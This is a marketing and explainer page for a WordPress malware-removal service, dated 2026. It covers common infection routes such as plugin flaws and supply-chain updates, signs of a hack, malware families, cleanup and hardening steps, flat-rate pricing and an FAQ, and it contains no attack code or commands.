WordPress Malware Removal: Clean a Hacked Site and Stop Reinfection (2026)

Key facts at a glance

WordPress security in 2026

Last updated June 27, 2026

Plugins are the front door: 91 percent of WordPress vulnerabilities are in plugins, per the Patchstack 2026 report, and exploitation of a disclosed critical flaw often begins within hours. An outdated or abandoned plugin is the most common way in.
Weak passwords are the other half: Around 81 percent of hacked WordPress sites involved weak or stolen passwords. Brute-force and credential-stuffing attacks are automated and run at massive scale around the clock.
The 2026 supply-chain shift: Even careful owners got hit. In 2026 attackers compromised plugin vendors and pushed backdoored code through trusted updates, including ShapedPlugin products and Gravity Forms, plus 30-plus plugins in an April 2026 attack.
It often hides from you: Redirect malware is frequently cloaked, firing only for mobile visitors, crawlers, or referral traffic, so the site looks normal in your browser while Google flags it. Trust Search Console over a quick self-check.
Clearing the warning: After the site is genuinely clean and hardened, a Google Search Console review removes the This site may be hacked warning, usually in one to three days. It only passes if the hidden backdoors are gone too.
The mistake that causes reinfection: Removing only the visible malware. Attackers leave a backdoor and a hidden admin account, so a site cleaned without finding those, deleting rogue users, regenerating the security keys, and patching the entry point is reinfected within days. Hardening is not optional, it is the cure.

Source: the Patchstack state of WordPress security report, the Sucuri guides on cleaning hacked WordPress and on hidden admin backdoors, security reporting on the 2026 plugin supply-chain attacks, the Google Search Central security documentation, and our hands-on cleanups. Get a quote in 60 seconds →

How WordPress sites get hacked in 2026

WordPress runs a large share of the web, which makes it the most attacked platform there is, and the attacks are almost entirely automated. Bots scan the internet constantly for known vulnerabilities and weak logins, so a site does not need to be a target to be hit, it just needs to be reachable and out of date. Understanding the three main ways in is what lets a cleanup actually close the door rather than just sweep up.

The first and largest is vulnerable plugins and themes. The Patchstack 2026 report found that 91 percent of WordPress vulnerabilities live in plugins, and when a serious flaw is publicly disclosed, automated exploitation frequently begins within hours, faster than many site owners patch. An outdated plugin, an abandoned one still installed, or a nulled or pirated plugin with a backdoor baked in is the most common entry point by a wide margin. The second is credentials. Around 81 percent of hacked sites involved a weak or stolen password, because brute-force and credential-stuffing attacks cost the attacker almost nothing and run at enormous scale.

The third has grown sharply in 2026: the supply chain attack. Instead of breaking into your site, attackers compromise the plugin vendor and push backdoored code through the official update channel that every site trusts. In 2026 this hit popular professional plugins, including ShapedPlugin products and Gravity Forms with its roughly one million installations, and an April 2026 campaign backdoored more than 30 trusted plugins through tampered updates. The unsettling part is that doing the right thing, keeping plugins updated, is exactly how the malware got installed. It means a hacked site is not always a careless one, and it means the cleanup has to consider where a piece of malware actually came from.

Signs your site is hacked

WordPress malware is built to stay hidden, so the signs are often indirect. If you recognize any of these, treat the site as compromised and act, because the longer an infection sits, the more SEO and reputation damage it does and the deeper it embeds.

⚠Visitors are redirected to spam, gambling, pharmaceutical, or adult sites
⚠Google shows This site may be hacked or Deceptive site ahead in search results
⚠Google Search Console reports a security issue, cloaking, or deceptive content
⚠Admin users you did not create appear, or appear and then vanish from the list
⚠A site colon search shows spam pages indexed under your domain you never made
⚠Randomly named files appear in wp-content/uploads or wp-includes
⚠Your host suspended the account or flagged it for malware
⚠The site is fine in your browser but customers or mobile users report redirects
⚠Unexpected scripts or iframes appear in the header, footer, or theme files
⚠A sudden, unexplained drop in search traffic or rankings

The most important one to internalize is the eighth: a site that looks perfectly normal to you can still be hacked. Redirect malware commonly cloaks itself, showing the infection only to mobile users, to Google crawlers, or to people who clicked through from a search result, while a desktop visit from the owner sees nothing wrong. That is why Google can flag your site while you are convinced it is fine. Believe the field reports.

The infections we remove

WordPress malware comes in a handful of recognizable families. Most real infections are a combination, a visible payload plus a quiet backdoor, and a thorough cleanup deals with both.

Redirect Hacks

Visitors sent to spam, gambling, pharma, or adult sites. Usually cloaked to fire only for mobile, crawlers, or referral traffic, and obfuscated with base64 or minified JavaScript so it hides from casual review.

Pharma Hacks and SEO Spam

Hidden spam links and pages injected into your content and database, concealed with CSS or off-screen positioning, pointing at pharmaceutical, gambling, or counterfeit-goods sites to abuse your search ranking.

Hidden Admin Backdoors

A backdoor creates an administrator account with the attacker credentials and writes code to hide that user from your dashboard, giving a permanent secret entrance that survives plugin updates.

Credit Card Skimmers

JavaScript injected into the checkout that copies customer card details as they type and sends them to the attacker. Built to evade detection and often active only on the payment page. The most damaging store infection.

Malicious File Backdoors

Randomly named PHP files in uploads, wp-includes, or the theme, plus malicious cron jobs, that let the attacker re-execute code. The reinfection engine behind most repeat hacks.

Database Injections

Spam, scripts, or redirects written directly into wp_options, wp_posts, or widget content, which survive a file-only cleanup. We clean the database, not just the files.

Defacements

Your homepage replaced or altered with the attacker message or content. Visible and embarrassing, but usually paired with a quieter backdoor that is the real problem to remove.

Phishing Pages

Fake login or banking pages hidden in a subfolder of your site to harvest victims credentials, which can get your domain blocklisted and your host to suspend you.

Spam Email and Mailer Scripts

Hidden scripts that use your server to send spam, which lands your domain on blocklists and breaks your legitimate email. We find and remove the mailer and its loader.

Cryptominers

Code that hijacks your server or your visitors browsers to mine cryptocurrency, slowing the site and spiking resource use until the host throttles or suspends the account.

Fake or Malicious Plugins

A plugin disguised as a security or utility tool that is actually the backdoor, or a legitimate plugin compromised in a supply chain attack and updated to carry malware.

Compromised Admin and FTP Users

Unauthorized accounts the attacker created to get back in. Left in place, they reinfect the site within days, which is why deleting them is part of every cleanup.

Match your symptom to the fix

Pick the row that matches what you are seeing. Each one links to the diagnostic for that specific kind of infection.

Symptom	Likely cause and fix
Visitors are redirected to spam, but the site looks fine when you visit	A cloaked redirect hack, firing only for mobile, crawlers, or referral traffic, with obfuscated code in the theme, .htaccess, or database. We find and remove it, then close the entry point. Fix a hacked site →
Google shows This site may be hacked, or flags a security issue in Search Console	Malware Google has detected, often SEO spam or a redirect. We clean it completely, then submit the Search Console review to remove the warning. Clear the Google warning →
Spam pages or pharmaceutical links are indexed under your domain	A pharma hack or SEO-spam injection, hidden with CSS or off-screen and pointing at encoded spam URLs. We remove the injected content and the backdoor feeding it. Remove SEO spam malware →
You keep getting reinfected days after cleaning the site yourself	A backdoor and a hidden admin user were left behind. Removing visible malware is not enough. We find every backdoor, delete unauthorized users, and harden so it cannot return. Stop the reinfection →
Your WooCommerce store may be leaking customer card details	A JavaScript skimmer on the checkout, built to evade detection and activate only at payment. We scan the checkout flow specifically and remove the skimmer and its backdoor. Remove a card skimmer →
Your site fell out of Google entirely after the hack	A hacked site can be deindexed or penalized once Google detects the malware. We clean and harden, then work the reindexing and review path to recover visibility. Recover from deindexing →

Why cleanup without hardening fails

This is the single most important thing to understand about a hacked WordPress site, and it is why so many do-it-yourself cleanups fail. The malware you can see, the redirect, the spam, the defacement, is the payload. It is not the infection. Underneath it, the attacker has almost always planted two things designed to survive your cleanup: a backdoor, a hidden piece of code that lets them run commands or re-upload malware at will, and a hidden administrator account that does not appear in your user list.

So the common story goes like this. You notice the redirect, you find and delete the obvious malicious code, the site looks clean, and you breathe out. A few days later it is hacked again, identically, and it feels like the cleanup did nothing. It did remove the payload. But the backdoor and the ghost admin were still there, so the attacker simply walked back in through the door you never found and reinstalled everything. Security researchers are blunt about this: without hardening, the same access that let the malware in allows reinfection within days.

What actually stops reinfection

Finding and removing every backdoor and malicious cron job, deleting every unauthorized admin and FTP user, regenerating the WordPress security keys so any stolen login session is invalidated, and patching or replacing the vulnerable or compromised plugin that was the entry point. Remove the malware and do none of that, and you are cleaning the same site again next week. This is the half of the work that a quick automated scan does not do, and the half we never skip.

How we clean and harden

Every cleanup follows the same disciplined sequence, because skipping a step is how infections come back.

Detect and confirm the infection

We scan the files, the database, and the checkout flow, and compare your core, theme, and plugin files against known-clean versions to surface every injected or foreign file, including the cloaked and obfuscated code that casual scans miss.

Isolate and back up before touching anything

We put the site in maintenance mode where appropriate and take a full backup of the compromised state first, so the cleanup is reversible and nothing is lost, then work without exposing visitors to the infection.

Remove every piece of malware

We clean the redirect or spam, replace compromised core files, disinfect the theme, plugins, uploads, .htaccess, and wp-config, and clean malicious content injected directly into the database. Files and database both, not one or the other.

Find and close every backdoor and rogue user

We hunt down the backdoors, malicious cron jobs, and the hidden admin and FTP accounts the attacker left, and remove them. This is the step that stops reinfection, and the step a quick scan skips.

Close the entry point

We identify how the attacker got in, a vulnerable or compromised plugin, a weak password, a supply-chain update, and patch or replace it, because cleaning without closing the door just resets the clock.

Harden against reinfection

We update everything, remove unused plugins and themes, regenerate the WordPress security keys to invalidate any stolen sessions, enforce strong passwords and two-factor on admin accounts, and set up a firewall and ongoing scanning.

Restore reputation and clear warnings

Once the site is genuinely clean and hardened, we submit the Google Search Console review to remove the This site may be hacked warning, and check that your domain is off any email or security blocklists.

Why specialist cleanup beats a scan

A security scanner is a useful tool and a poor cleanup. It is good at flagging known-bad signatures, but modern WordPress malware is obfuscated and often novel, so a scan misses the cloaked redirect, the freshly minted backdoor, and the database injection it does not have a signature for. More importantly, a scanner does not find the entry point, does not delete the ghost admin, and does not harden anything, which is exactly why sites cleaned by an automated tool alone so often come back infected. The scan removes what it recognizes and leaves the rest.

We do this work all day, so the process is the same every time and it is thorough by default. Compare every file against a known-clean baseline. Read the obfuscated code rather than trusting a signature. Clean the database as well as the files. Hunt the backdoors and rogue users specifically. Trace and close the entry point. Harden so it cannot recur. We charge a flat rate because we are fast and complete at this specific work, and because a hacked site is an emergency that should not come with an open-ended bill.

The 2-hour guarantee and the money-back promise are the enforcement. We do not get paid if we cannot get the site clean, which keeps us honest about scope on a badly compromised site. If an infection is so deep that a clean rebuild is the right call, we tell you that up front rather than charging to chase malware through a site that should be rebuilt.

Specific security fixes

The exact symptom points at a specific diagnostic. Click through to the one for yours.

My WordPress site is hacked

Redirects, defacement, a Google warning, or unknown admin users. Full diagnosis and the complete cleanup-and-harden process.

Fix a hacked site →Malware, SEO spam, or reinfection

Injected spam, backdoors, and the repeat-infection cycle. We remove it across files and database and close the door for good.

Remove WordPress malware →Site deindexed or penalized after a hack

Google dropped the site once it detected the malware. We clean, harden, and work the review and reindexing path.

Recover from deindexing →Full security cleanup service

The complete service: remove the infection, close the entry point, delete backdoors, harden, and clear warnings.

See the security service →

View the full WordPress and platform error library →

Pricing and process

Tell us what you are seeing

Use the quote form with your URL and the symptom, a redirect, a Google warning, unknown admins. A senior engineer assesses the infection and replies with a flat-rate quote, usually within 30 minutes during business hours.

Approve, we start immediately

No scheduling step, no kickoff call. Approve the quote and we begin. You provide hosting and admin access through a secure link. The clock starts on the 2-hour guarantee.

Clean, hardened, and verified

We remove the malware and the backdoors, close the entry point, harden the site, and submit the Google review. We tell you exactly what was wrong and how it got in. Money back if we cannot clean it.

WordPress malware FAQ

How much does WordPress malware removal cost in 2026?

WordPress malware removal at Instant Nerds is flat rate, $49 to $149 depending on the infection. A contained redirect or SEO-spam cleanup is usually $99, and a deeper infection with backdoors, a skimmer, or a database injection is $99 to $149. There is no hourly billing and no surprise add-ons. You get the quote before we start, and the work always includes the three things that actually matter: removing every piece of malware, finding and closing the entry point so it cannot come straight back, and hardening the site against reinfection. If we cannot clean it, you pay nothing.

How do I know my WordPress site is actually hacked?

The clearest signs are visitors redirected to spam, gambling, pharmaceutical, or adult sites, a Google warning like This site may be hacked or Deceptive site ahead, a security issue flagged in Google Search Console, admin users you did not create, spam pages indexed under your domain that you can find with a site colon search, or your host suspending the account. The tricky part is that a lot of WordPress malware hides from you specifically. Redirect hacks are often cloaked, firing only for mobile visitors, search engine crawlers, or people arriving from Google, so your own quick visit from your desktop looks completely normal while real visitors and Google see the infection. If Search Console or your customers report a problem, trust that over your own browser check.

Why does my site keep getting reinfected after I clean it?

Because the malware you can see is not the whole infection. Attackers almost always leave a backdoor, a hidden piece of code that gives them a permanent secret way back in, and a hidden administrator account that does not show in your user list. If you remove the visible redirect or spam but leave the backdoor and the ghost admin, the attacker simply walks back in and reinfects the site, often within days. This is the single most common reason a cleanup fails. Removing malware is only half the job. The other half is finding and closing every backdoor, deleting every unauthorized admin and FTP user, regenerating the security keys to invalidate stolen sessions, and patching the vulnerability that let them in. We do all of it, because cleaning without hardening guarantees you will be hacked again.

How did my site get hacked in the first place?

Almost always one of three ways. First, a vulnerable plugin or theme: 91 percent of WordPress vulnerabilities are in plugins per the Patchstack 2026 report, and when a critical flaw is disclosed, automated exploitation often begins within hours, so an outdated or abandoned plugin is the most common door. Second, a weak or stolen password: around 81 percent of hacked WordPress sites involved weak or reused credentials, and brute-force and credential-stuffing attacks run fully automated at massive scale. Third, and increasingly in 2026, a supply chain attack, where the malware arrived inside a legitimate plugin update from a trusted source. Part of our cleanup is identifying which of these let the attacker in, because if we do not close that door, cleaning the site only buys you a few days.

My plugins are all reputable and updated. How was I still hacked?

In 2026 that can still happen because of supply chain attacks, and it is not your fault. Attackers have learned to compromise the plugin vendor rather than your site, then push backdoored code through the official update channel that everyone trusts. In 2026 alone, popular pro plugins including ShapedPlugin products and Gravity Forms, which has around a million installations, were compromised this way, and an April 2026 attack backdoored more than 30 trusted plugins through tampered updates. If you updated a plugin during the window when its release was compromised, you installed the malware yourself by doing exactly the right thing. The fix is the same as any infection: remove the malicious code, replace the affected plugin with a known-clean version, close any backdoor it planted, and harden. We track these incidents and check whether your infection traces to one.

Will you remove the Google This site may be hacked warning?

Yes, and it is part of every cleanup. Once the site is genuinely clean and hardened, we submit a review request through Google Search Console, under Security Issues, confirming the problems are resolved. Google typically processes these within one to three days for a site with an otherwise clean record, and the warning is removed from your search listings once it passes. The important sequence is that the review only succeeds if the site is actually clean, including the hidden backdoors, so a rushed cleanup that leaves malware behind gets the review rejected and the warning stays. We make sure the site passes the first time by cleaning it completely before we request the review.

Should I just restore from a backup instead of cleaning?

A clean backup from before the infection is a legitimate fast path, but only if three things are true. You need a backup from genuinely before the malware arrived, which is harder than it sounds because infections often sit quietly for weeks before doing anything visible, so a recent backup may already be infected. You need to not lose the content, orders, and changes made since that backup. And, crucially, restoring a backup does nothing about the vulnerability that let the attacker in, so if you restore and do not patch and harden, you get reinfected through the same door. When a clean pre-infection backup exists and the data loss is acceptable, we will use it and then harden. When it is not, we clean the live site file by file. Either way the hardening step is what actually keeps you safe.

My store takes payments. Could a hack be stealing card details?

It is one of the most damaging infections and worth checking urgently. Credit card skimmers are JavaScript injected into the checkout that quietly copies customers card details as they type and sends them to the attacker, and they are deliberately built to evade detection, often only activating on the checkout page and heavily obfuscating their code. A store can look and function perfectly while skimming every transaction. The signs are subtle: an unfamiliar script on the checkout, an unexpected external request when a card is entered, or a payment processor or customer reporting fraud traced to your site. If you run WooCommerce or any checkout, a skimmer is the infection you most want ruled out, both for your customers and for your liability. We scan the checkout flow specifically and remove any skimmer along with the backdoor that planted it.

Sources and further reading

The security data and incident details on this page come from the Patchstack research, Sucuri security guides, security reporting on the 2026 plugin supply-chain attacks, and Google Search Central.